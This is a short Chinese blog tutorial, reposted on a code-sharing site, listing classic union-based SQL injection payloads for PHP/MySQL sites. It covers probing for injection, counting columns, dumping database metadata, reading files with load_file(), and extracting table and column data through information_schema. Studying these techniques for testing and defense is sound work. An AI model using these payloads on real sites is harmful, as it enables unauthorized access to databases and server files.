码迷,mamicode.com
首页 > 数据库 > 详细

SQL注入(一)普通型注入

时间:2015-05-19 00:35:04      阅读:164      评论:0      收藏:0      [点我收藏+]

标签:

既然说了从头开始,先从注入开始吧,先来温习一下之前会的一些注入。

PHP注入

0x01:

判断是否存在注入:

‘   报错      

‘ and 1=1   正确

‘ and 1=2   错误

0x01:

order by X  X表示整数,判断数据库共有多少个字段

‘ and 1=2 union select 1,2,3...  //列出所有字段,看页面上显示哪些字段,换成我么你想查询的数据

‘ and 1=2 union select 1,user(),3... //网页上显示2的地方换显示数据库用户用户名

这儿user()可换成:

                 database()    当前数据库

                 @@datadir   数据库地址

                  version()    数据库版本

                  load_file()    读取指定文件

                。。。。。

‘ and 1=2 union select 1,TABLE_NAME,3 from information_schema.tables where TABLE_SCHEMA=database() limit 0,1 //爆表名

‘ and 1=2 union select 1,COLUMN_NAME,3 from information_schema.columns where TABLE_NAME=table_name limit 0,1   //爆列名

‘ and 1=2 union select  1, column,3 from table  //爆数据

 

  注意事项:

注入中有时候需要注释部分语句,可以用

#  %23

+--+  //+表示链接,

空格可用%20

 

SQL注入(一)普通型注入

标签:

原文地址:http://www.cnblogs.com/iDerr/p/4513307.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!